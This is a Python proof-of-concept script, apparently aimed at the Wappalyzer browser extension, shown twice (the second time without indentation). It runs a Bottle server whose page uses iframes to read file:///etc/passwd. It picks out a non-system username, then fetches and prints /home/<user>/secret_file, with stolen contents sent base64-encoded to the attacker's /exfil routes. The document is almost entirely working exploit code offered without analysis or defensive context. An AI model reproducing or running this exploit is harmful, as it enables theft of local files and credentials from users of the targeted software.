csalazar/wappalyzer-exploit.py Secret

## wappalyzer-exploit.py
import re
from base64 import b64decode

from bottle import request, route, run

html = """
    <html>
      <body>
        <iframe id="file"></iframe>
        <iframe id="exfil"></iframe>
        <script>
          var frame = document.getElementById('file');
          frame.src = 'file:///%s';
          frame.onload = function() {
            const base64File = btoa(frame.contentDocument.body.innerHTML);
            document.getElementById('exfil').src = "/exfil%s?data=" + base64File;
          }
        </script>
      </body>
    </html>
"""


def parse_users(data):
    users = set([re.findall("^([^:]+):", line)[0] for line in data.splitlines()])

    # Default users in ubuntu 20.04
    system_users = {
        "backup", "systemd-timesync", "avahi-autoipd", "cups-pk-helper", "syslog",
        "geoclue", "gnome-initial-setup", "systemd-network", "usbmux", "vboxadd", "uuidd",
        "redis", "bin", "pulse", "systemd-coredump", "mail", "uucp", "news", "_apt", "messagebus",
        "proxy", "dnsmasq", "whoopsie", "www-data", "speech-dispatcher", "root", "gdm",
        "systemd-resolve", "hplip", "sync", "avahi", "sshd", "tss", "irc", "daemon", "saned",
        "list", "rtkit", "colord", "sys", "games", "nm-openvpn", "tcpdump", "nobody", "man",
        "kernoops", "lp", "gnats",
    }

    users = list(users - system_users)
    return users


@route("/")
def index():
    return html % ("/etc/passwd", 1)


@route("/exfil1")
def exfil1():
    data = request.query["data"]
    decoded_data = b64decode(data).decode()
    users = parse_users(decoded_data)
    user = users[0]
    target = f"/home/{users[0]}/secret_file"

    print(f"[exploit] Detected user: {user}")
    print(f"[exploit] Requesting path {target} ..")

    return html % (target, 2)


@route("/exfil2")
def exfil2():
    data = request.query["data"]
    decoded_data = b64decode(data).decode()

    print(f"[exploit] Retrieved file content: {decoded_data}")

    return "<html></html>"


run(host="0.0.0.0", port=8080)
	import re
	from base64 import b64decode

	from bottle import request, route, run

	html = """
	<html>
	<body>
	<iframe id="file"></iframe>
	<iframe id="exfil"></iframe>
	<script>
	var frame = document.getElementById('file');
	frame.src = 'file:///%s';
	frame.onload = function() {
	const base64File = btoa(frame.contentDocument.body.innerHTML);
	document.getElementById('exfil').src = "/exfil%s?data=" + base64File;
	}
	</script>
	</body>
	</html>
	"""


	def parse_users(data):
	users = set([re.findall("^([^:]+):", line)[0] for line in data.splitlines()])

	# Default users in ubuntu 20.04
	system_users = {
	"backup", "systemd-timesync", "avahi-autoipd", "cups-pk-helper", "syslog",
	"geoclue", "gnome-initial-setup", "systemd-network", "usbmux", "vboxadd", "uuidd",
	"redis", "bin", "pulse", "systemd-coredump", "mail", "uucp", "news", "_apt", "messagebus",
	"proxy", "dnsmasq", "whoopsie", "www-data", "speech-dispatcher", "root", "gdm",
	"systemd-resolve", "hplip", "sync", "avahi", "sshd", "tss", "irc", "daemon", "saned",
	"list", "rtkit", "colord", "sys", "games", "nm-openvpn", "tcpdump", "nobody", "man",
	"kernoops", "lp", "gnats",
	}

	users = list(users - system_users)
	return users


	@route("/")
	def index():
	return html % ("/etc/passwd", 1)


	@route("/exfil1")
	def exfil1():
	data = request.query["data"]
	decoded_data = b64decode(data).decode()
	users = parse_users(decoded_data)
	user = users[0]
	target = f"/home/{users[0]}/secret_file"

	print(f"[exploit] Detected user: {user}")
	print(f"[exploit] Requesting path {target} ..")

	return html % (target, 2)


	@route("/exfil2")
	def exfil2():
	data = request.query["data"]
	decoded_data = b64decode(data).decode()

	print(f"[exploit] Retrieved file content: {decoded_data}")

	return "<html></html>"


	run(host="0.0.0.0", port=8080)